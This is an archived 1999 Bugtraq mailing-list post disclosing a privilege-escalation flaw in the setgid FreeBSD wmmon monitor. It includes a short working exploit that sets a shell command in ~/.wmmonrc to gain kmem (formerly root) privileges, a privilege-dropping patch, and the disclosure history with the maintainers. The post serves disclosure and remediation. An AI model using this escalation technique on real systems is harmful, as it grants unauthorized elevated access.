Bugtraq mailing list archives
Wmmon under FreeBSD
From: sreid () SEA-TO-SKY NET (Steve Reid)
Date: Tue, 21 Dec 1999 00:36:44 -0800
Wmmon is a popular program for monitoring CPU load and other system utilization. It runs as a dockapp under WindowMaker. The FreeBSD version of this program has a feature that can be trivially exploited to gain group kmem in recent installs, or user root in really old installs. This affects the FreeBSD version because under FreeBSD the program must be installed setgid kmem or setuid root in order to access system load information through the memory devices. The Linux version should not be vulnerable because it reads information through procfs which requires no special privileges. Exploit: % id uid=1000(steve) gid=1000(steve) groups=1000(steve) % echo 'left /bin/sh' > ~/.wmmonrc % wmmon -display myworkstation.evilhacker.net:0.0 Monitoring 2 devices for activity. {Left-click on the little window that appears} current stat is :1 $ id uid=1000(steve) gid=1000(steve) egid=2(kmem) groups=2(kmem), 1000(steve) Here is a patch: --- work/wmmon.app/wmmon/wmmon.c.old Thu Dec 2 02:06:55 1999 +++ work/wmmon.app/wmmon/wmmon.c Thu Dec 2 04:20:22 1999 @@ -318,6 +318,8 @@ if (kvmd==NULL) kvmd = kvm_openfiles(NULL, NULL, NULL, O_RDONLY, errbuf); if (kvmd==NULL) { fprintf(stderr, "kvm_openfiles: %s\n", errbuf); exit(errno); } + if (setgid(getgid()) != 0) exit(1); /* We're sgid kmem. Give up privs. */ + if (setuid(getuid()) != 0) exit(1); /* If we're suid, give that up too. */ if (kvmd) { if (kvm_nlist(kvmd, nl) >= 0) { struct nlist *nlp; To fix your wmmon binary save the above as wmmon.patch and do this: cd /usr/ports/sysutils/wmmon make patch patch < wmmon.patch make su root make deinstall make reinstall The exploit and patch were tested with wmmon 1.0.b2 installed using the ports tree. Standard disclaimers apply. I first emailed the FreeBSD wmmon port maintainer about this back in February. At that time the program was installed setuid root, giving easy access to user root instead of just group kmem. There was also a buffer overflow on the $HOME variable which could probably be used to access the memory device file descriptors even if privileges were relinquished (which they weren't). The port maintainer acknowledged my email and a message warning of a security vulerability was placed in the pkg/DESCR file but as far as I could tell that was all that was done for some weeks. The port maintainer changed during that time and I guess my email got lost in the switch. I forgot about it until a few weeks ago when I checked the port again. The warning message is gone, the buffer overflow on $HOME is fixed, and the program now installs setgid kmem instead of setuid root. The problem still exists, it has just been reduced from a root exploit to kmem. On Dec. 2nd I again emailed the port maintainer (now a different person) and he acknowledged my email, but as of Dec. 20th the port still appears to be vulnerable.
Current thread:
- NAV2000 Email Protection DoS kyle () RAGEOUT ORG (Dec 17)
- <Possible follow-ups>
- Fw: NAV2000 Email Protection DoS Bohemian (Dec 17)
- Re: Fw: NAV2000 Email Protection DoS Hank Pike (Dec 20)
- Wmmon under FreeBSD Steve Reid (Dec 21)
- Re: Wmmon under FreeBSD Ajax (Dec 21)
- Re: Wmmon under FreeBSD Dominic Mitchell (Dec 24)
- Re: Wmmon under FreeBSD Greg A. Woods (Dec 29)
- Fwd: Sun Security Bulletin #00191 Bryan Blackburn (Dec 29)